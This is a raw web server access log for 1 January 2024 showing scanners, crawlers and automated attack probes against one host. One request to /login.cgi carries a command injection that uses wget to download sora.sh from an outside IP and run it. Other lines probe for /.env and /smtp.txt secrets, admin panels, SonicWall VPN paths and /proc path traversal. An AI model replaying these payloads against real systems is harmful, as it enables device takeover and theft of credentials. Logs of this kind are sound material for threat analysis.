165.154.118.145 - - [01/Jan/2024:03:57:38 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/583.37 (KHTML, like Gecko) Chrome/103.0.875 Safari/537.36"
165.154.118.145 - - [01/Jan/2024:03:57:38 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.36 (KHTML, like Gecko) Chrome/95.0.1621 Safari/537.36"
165.154.118.145 - - [01/Jan/2024:03:57:38 +0100] "GET /axis2-admin/ HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.118.145 - - [01/Jan/2024:03:57:39 +0100] "GET /axis2/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.118.145 - - [01/Jan/2024:03:57:39 +0100] "GET /axis2/axis2-admin/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
45.79.168.172 - - [01/Jan/2024:03:58:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
136.243.83.42 - - [01/Jan/2024:04:01:06 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; MetaJobBot; https://www.metajob.de/crawler)"
136.243.83.42 - - [01/Jan/2024:04:01:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MetaJobBot; https://www.metajob.de/crawler)"
45.142.182.76 - - [01/Jan/2024:04:01:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
192.155.88.231 - - [01/Jan/2024:04:02:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
218.145.61.20 - - [01/Jan/2024:04:02:05 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
172.104.11.46 - - [01/Jan/2024:04:02:13 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.248.133.185 - - [01/Jan/2024:04:07:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.185 - - [01/Jan/2024:04:07:33 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.185 - - [01/Jan/2024:04:07:33 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.79.181.104 - - [01/Jan/2024:04:10:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
162.216.150.20 - - [01/Jan/2024:04:12:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
172.104.11.34 - - [01/Jan/2024:04:12:41 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.195 - - [01/Jan/2024:04:21:14 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
172.104.11.34 - - [01/Jan/2024:04:22:52 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.79.128.205 - - [01/Jan/2024:04:26:34 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.163 - - [01/Jan/2024:04:27:40 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
193.106.29.122 - - [01/Jan/2024:04:32:01 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
45.142.182.76 - - [01/Jan/2024:04:36:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
205.210.31.10 - - [01/Jan/2024:04:39:59 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
71.6.134.232 - - [01/Jan/2024:04:46:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
45.142.182.76 - - [01/Jan/2024:04:46:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
91.92.243.232 - - [01/Jan/2024:04:46:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
91.92.243.232 - - [01/Jan/2024:04:46:32 +0100] "GET ../../proc/ HTTP" 400 329 "-" "-"
172.105.128.11 - - [01/Jan/2024:04:46:56 +0100] "\x16\x03\x01" 501 318 "-" "-"
35.203.210.139 - - [01/Jan/2024:04:49:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
205.210.31.145 - - [01/Jan/2024:04:55:09 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
103.15.240.250 - - [01/Jan/2024:05:00:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
71.6.134.232 - - [01/Jan/2024:05:02:12 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.246.42.116 - - [01/Jan/2024:05:03:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.3"
45.43.33.218 - - [01/Jan/2024:05:06:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
95.65.50.236 - - [01/Jan/2024:05:09:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
167.94.145.58 - - [01/Jan/2024:05:13:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.58 - - [01/Jan/2024:05:13:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.58 - - [01/Jan/2024:05:13:26 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.58 - - [01/Jan/2024:05:13:26 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
139.177.205.248 - - [01/Jan/2024:05:18:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
143.110.136.76 - - [01/Jan/2024:05:19:01 +0100] "POST /wsman HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
45.33.116.226 - - [01/Jan/2024:05:19:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
45.33.116.226 - - [01/Jan/2024:05:19:09 +0100] "GET /auth.html HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
45.33.116.226 - - [01/Jan/2024:05:19:09 +0100] "GET /auth1.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
45.33.116.226 - - [01/Jan/2024:05:19:09 +0100] "GET /api/sonicos/auth HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
45.33.116.226 - - [01/Jan/2024:05:19:09 +0100] "GET /sslvpnLogin.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
45.33.116.226 - - [01/Jan/2024:05:19:09 +0100] "GET /api/sonicos/tfa HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
172.104.208.15 - - [01/Jan/2024:05:19:20 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
172.104.208.15 - - [01/Jan/2024:05:19:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
172.104.208.15 - - [01/Jan/2024:05:20:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
172.104.208.15 - - [01/Jan/2024:05:20:53 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
193.106.29.122 - - [01/Jan/2024:05:26:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
50.116.3.183 - - [01/Jan/2024:05:29:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
104.237.135.234 - - [01/Jan/2024:05:29:29 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
104.237.135.234 - - [01/Jan/2024:05:29:31 +0100] "Gh0st\xad" 501 321 "-" "-"
104.237.135.234 - - [01/Jan/2024:05:29:34 +0100] "HELP" 501 319 "-" "-"
104.237.135.234 - - [01/Jan/2024:05:29:35 +0100] "\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc" 501 350 "-" "-"
104.237.135.234 - - [01/Jan/2024:05:29:36 +0100] "\x16\x03\x01" 501 318 "-" "-"
104.237.135.234 - - [01/Jan/2024:05:29:38 +0100] "\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff" 400 329 "-" "-"
213.32.39.38 - - [01/Jan/2024:05:30:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
45.79.128.205 - - [01/Jan/2024:05:31:02 +0100] "\x16\x03\x01" 501 318 "-" "-"
74.82.47.2 - - [01/Jan/2024:05:32:36 +0100] "\x16\x03\x01" 501 318 "-" "-"
128.90.43.121 - - [01/Jan/2024:05:36:29 +0100] "HEAD /wordpress HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.90.43.121 - - [01/Jan/2024:05:36:29 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.90.43.121 - - [01/Jan/2024:05:36:29 +0100] "HEAD /wp HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.90.43.121 - - [01/Jan/2024:05:36:29 +0100] "HEAD /bc HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.90.43.121 - - [01/Jan/2024:05:36:29 +0100] "HEAD /bk HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.90.43.121 - - [01/Jan/2024:05:36:29 +0100] "HEAD /backup HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.90.43.121 - - [01/Jan/2024:05:36:30 +0100] "HEAD /old HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.90.43.121 - - [01/Jan/2024:05:36:30 +0100] "HEAD /new HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.90.43.121 - - [01/Jan/2024:05:36:30 +0100] "HEAD /main HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.90.43.121 - - [01/Jan/2024:05:36:30 +0100] "HEAD /home HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
167.94.138.52 - - [01/Jan/2024:05:37:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.52 - - [01/Jan/2024:05:37:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.52 - - [01/Jan/2024:05:37:42 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.52 - - [01/Jan/2024:05:37:43 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
205.210.31.162 - - [01/Jan/2024:05:51:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.162 - - [01/Jan/2024:05:51:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.24 - - [01/Jan/2024:05:57:49 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.24 - - [01/Jan/2024:05:57:49 +0100] "\x16\x03\x01" 501 318 "-" "-"
193.106.29.122 - - [01/Jan/2024:05:59:49 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
205.210.31.19 - - [01/Jan/2024:06:13:13 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
78.153.140.221 - - [01/Jan/2024:06:21:04 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.221 - - [01/Jan/2024:06:21:05 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
78.153.140.219 - - [01/Jan/2024:06:21:59 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.219 - - [01/Jan/2024:06:21:59 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
167.94.145.56 - - [01/Jan/2024:06:29:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.56 - - [01/Jan/2024:06:29:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.56 - - [01/Jan/2024:06:29:58 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.56 - - [01/Jan/2024:06:29:58 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
193.106.29.122 - - [01/Jan/2024:06:37:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
37.99.69.44 - - [01/Jan/2024:06:42:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
78.153.140.221 - - [01/Jan/2024:06:51:54 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.221 - - [01/Jan/2024:06:51:55 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
193.106.29.122 - - [01/Jan/2024:06:54:21 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [01/Jan/2024:07:00:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.172.80.202 - - [01/Jan/2024:07:00:53 +0100] "GET /smtp.txt HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
31.172.80.202 - - [01/Jan/2024:07:00:53 +0100] "GET /smtp.txt HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; Android 9; ONEPLUS A6003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36"
31.172.80.202 - - [01/Jan/2024:07:00:54 +0100] "GET /smtp.txt HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba"
31.172.80.202 - - [01/Jan/2024:07:00:54 +0100] "GET /smtp.txt HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36"
31.172.80.202 - - [01/Jan/2024:07:00:54 +0100] "GET /smtp.txt HTTP/1.1" 404 313 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:31.0) Gecko/20100101 Firefox/31.0 SeaMonkey/2.28"
31.172.80.202 - - [01/Jan/2024:07:00:54 +0100] "GET /smtp.txt HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13"
31.172.80.202 - - [01/Jan/2024:07:00:54 +0100] "GET /smtp.txt HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AP"
31.172.80.202 - - [01/Jan/2024:07:00:54 +0100] "GET /smtp.txt HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; Android 12; Pixel 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36"
31.172.80.202 - - [01/Jan/2024:07:00:54 +0100] "GET /smtp.txt HTTP/1.1" 404 313 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0"
31.172.80.202 - - [01/Jan/2024:07:00:54 +0100] "GET /smtp.txt HTTP/1.1" 404 313 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1"
212.91.246.72 - - [01/Jan/2024:07:01:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.191 - - [01/Jan/2024:07:01:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Jan/2024:07:02:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:03:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:04:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:05:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:06:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:07:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.191 - - [01/Jan/2024:07:08:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jan/2024:07:08:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:09:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:10:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:11:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:12:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:13:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.19 - - [01/Jan/2024:07:14:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [01/Jan/2024:07:14:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:15:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.18 - - [01/Jan/2024:07:15:49 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0"
212.91.246.72 - - [01/Jan/2024:07:16:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.29 - - [01/Jan/2024:07:16:24 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [01/Jan/2024:07:17:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:18:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.216.149.129 - - [01/Jan/2024:07:18:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Jan/2024:07:19:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2024:07:20:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.172.80.202 - - [01/Jan/2024:07:20:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4812.0 Mobile Safari/537.36"
31.172.80.202 - - [01/Jan/2024:07:20:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G990E) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/17.0 Chrome/96.0.4664.104 Mobile Safari/537.36"
31.172.80.202 - - [01/Jan/2024:07:20:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36"
31.172.80.202 - - [01/Jan/2024:07:20:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174"
31.172.80.202 - - [01/Jan/2024:07:20:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 OPR/85.0.4341.75"
31.172.80.202 - - [01/Jan/2024:07:20:41 +0100] "GET /.env HTTP/1.1" 404 309 "-" "grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org)"
31.172.80.202 - - [01/Jan/2024:07:20:41 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; NetBSD amd64; rv:30.0) Gecko/20100101 Firefox/30.0"
31.172.80.202 - - [01/Jan/2024:07:20:41 +0100] "GET /.env HTTP/1.1" 404 309 "-" "libwww-perl/5.820"
31.172.80.202 - - [01/Jan/2024:07:20:41 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba"
31.172.80.202 - - [01/Jan/2024:07:20:41 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)"
